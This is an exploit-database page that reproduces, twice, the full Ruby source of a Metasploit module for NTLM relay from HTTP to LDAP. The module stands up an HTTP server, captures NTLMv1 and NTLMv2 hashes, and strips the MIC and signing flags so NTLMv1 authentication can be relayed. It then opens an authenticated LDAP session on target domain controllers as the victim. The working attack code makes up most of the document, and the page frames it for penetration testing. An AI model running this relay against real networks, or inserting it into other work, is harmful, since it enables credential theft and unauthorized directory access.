Microsoft Windows HTTP to LDAP Relay_MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-

Description

This module supports running an HTTP server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the configured RHOSTS hosts. It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-

Published Apr 30, 2026 at 18:57

Affected Product

Affected Versions # frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl'
require 'rex/proto/gss'

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::Relay
include Msf::Auxiliary::CommandShell

attr_accessor :service

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Microsoft Windows HTTP to LDAP Relay',
'Description' => %q{
This module supports running an HTTP server which validates credentials, and
then attempts to execute a relay attack against an LDAP server on the
configured RHOSTS hosts.

It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check
(MIC). As a result, this will only work with NTLMv1. The module takes care of
removing the relevant flags to bypass signing.

If the relay succeeds, an LDAP session to the target will be created. This can
be used by any modules that support LDAP sessions, like `admin/ldap/rbcd` or
`auxiliary/gather/ldap_query`.

Supports LDAP and captures NTLMv1 as well as NTLMv2 hashes.
},
'Author' => [
'jheysel-r7' # module and http_relay server
],
'License' => MSF_LICENSE,
'DefaultTarget' => 0,
'Actions' => [
[ 'CREATE_LDAP_SESSION', { 'Description' => 'Create an LDAP session' } ]
],
'PassiveActions' => [ 'CREATE_LDAP_SESSION' ],
'DefaultAction' => 'CREATE_LDAP_SESSION',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]
}
)
)

register_options(
[
Opt::RPORT(389)
]
)

register_advanced_options(
[
OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),
OptInt.new('SessionKeepalive', [true, 'Time (in seconds) for sending protocol-level keepalive messages', 10 * 60])
]
)
end

def srvport
datastore['SRVPORT']
end

def relay_targets
Msf::Exploit::Remote::Relay::TargetList.new(
:ldap,
datastore['RPORT'],
datastore['RHOSTS'],
datastore['TARGETURI'],
randomize_targets: datastore['RANDOMIZE_TARGETS'],
drop_mic_only: false,
drop_mic_and_sign_key_exch_flags: true
)
end

def check_options
unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)
fail_with(Failure::BadConfig, 'This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`')
end
end

def run
check_options

start_service
print_status('Server started.')
@http_relay_service.wait if @http_relay_service
end

def on_relay_success(relay_connection:, relay_identity:)
print_good('Relay succeeded')
session_setup(relay_connection, relay_identity)
rescue StandardError => e
elog('Failed to setup the session', error: e)
end

def session_setup(relay_connection, relay_identity)
client = relay_connection.create_ldap_client
ldap_session = Msf::Sessions::LDAP.new(
relay_connection.socket,
{
client: client,
keepalive_seconds: datastore['SessionKeepalive']
}
)
domain, _, username = relay_identity.partition('\\')
datastore_options = {
'DOMAIN' => domain,
'USERNAME' => username
}
start_session(self, nil, datastore_options, false, ldap_session.rstream, ldap_session)
end
end

{
    "lastseen": "2026-04-30T19:28:02",
    "description": "This module supports running an HTTP server which validates credentials, and then attempts to execute a relay attack against an LDAP server on the configured RHOSTS hosts. It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check...",
    "published": "2026-04-30T18:57:43",
    "modified": "2026-04-30T18:57:43",
    "type": "metasploit",
    "title": "Microsoft Windows HTTP to LDAP Relay",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-SERVER-RELAY-HTTP_TO_LDAP-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# frozen_string_literal: true\n\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\nrequire 'openssl'\nrequire 'rex/proto/gss'\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::Remote::HttpServer::Relay\n  include Msf::Auxiliary::CommandShell\n\n  attr_accessor :service\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Microsoft Windows HTTP to LDAP Relay',\n        'Description' => %q{\n          This module supports running an HTTP server which validates credentials, and\n          then attempts to execute a relay attack against an LDAP server on the\n          configured RHOSTS hosts.\n\n          It is not possible to relay NTLMv2 to LDAP due to the Message Integrity Check\n          (MIC). As a result, this will only work with NTLMv1. The module takes care of\n          removing the relevant flags to bypass signing.\n\n          If the relay succeeds, an LDAP session to the target will be created. This can\n          be used by any modules that support LDAP sessions, like `admin/ldap/rbcd` or\n          `auxiliary/gather/ldap_query`.\n\n          Supports LDAP and captures NTLMv1 as well as NTLMv2 hashes.\n        },\n        'Author' => [\n          'jheysel-r7' # module and http_relay server\n        ],\n        'License' => MSF_LICENSE,\n        'DefaultTarget' => 0,\n        'Actions' => [\n          [ 'CREATE_LDAP_SESSION', { 'Description' => 'Create an LDAP session' } ]\n        ],\n        'PassiveActions' => [ 'CREATE_LDAP_SESSION' ],\n        'DefaultAction' => 'CREATE_LDAP_SESSION',\n        'Notes' => {\n          'Stability' => [ CRASH_SAFE ],\n          'Reliability' => [ REPEATABLE_SESSION ],\n          'SideEffects' => [ IOC_IN_LOGS, ACCOUNT_LOCKOUTS ]\n        }\n      )\n    )\n\n    register_options(\n      [\n        Opt::RPORT(389)\n      ]\n    )\n\n    register_advanced_options(\n      [\n        OptBool.new('RANDOMIZE_TARGETS', [true, 'Whether the relay targets should be randomized', true]),\n        OptInt.new('SessionKeepalive', [true, 'Time (in seconds) for sending protocol-level keepalive messages', 10 * 60])\n      ]\n    )\n  end\n\n  def srvport\n    datastore['SRVPORT']\n  end\n\n  def relay_targets\n    Msf::Exploit::Remote::Relay::TargetList.new(\n      :ldap,\n      datastore['RPORT'],\n      datastore['RHOSTS'],\n      datastore['TARGETURI'],\n      randomize_targets: datastore['RANDOMIZE_TARGETS'],\n      drop_mic_only: false,\n      drop_mic_and_sign_key_exch_flags: true\n    )\n  end\n\n  def check_options\n    unless framework.features.enabled?(Msf::FeatureManager::LDAP_SESSION_TYPE)\n      fail_with(Failure::BadConfig, 'This module requires the `ldap_session_type` feature to be enabled. Please enable this feature using `features set ldap_session_type true`')\n    end\n  end\n\n  def run\n    check_options\n\n    start_service\n    print_status('Server started.')\n    @http_relay_service.wait if @http_relay_service\n  end\n\n  def on_relay_success(relay_connection:, relay_identity:)\n    print_good('Relay succeeded')\n    session_setup(relay_connection, relay_identity)\n  rescue StandardError => e\n    elog('Failed to setup the session', error: e)\n  end\n\n  def session_setup(relay_connection, relay_identity)\n    client = relay_connection.create_ldap_client\n    ldap_session = Msf::Sessions::LDAP.new(\n      relay_connection.socket,\n      {\n        client: client,\n        keepalive_seconds: datastore['SessionKeepalive']\n      }\n    )\n    domain, _, username = relay_identity.partition('\\\\')\n    datastore_options = {\n      'DOMAIN' => domain,\n      'USERNAME' => username\n    }\n    start_session(self, nil, datastore_options, false, ldap_session.rstream, ldap_session)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/relay/http_to_ldap.rb",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/server/relay/http_to_ldap/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply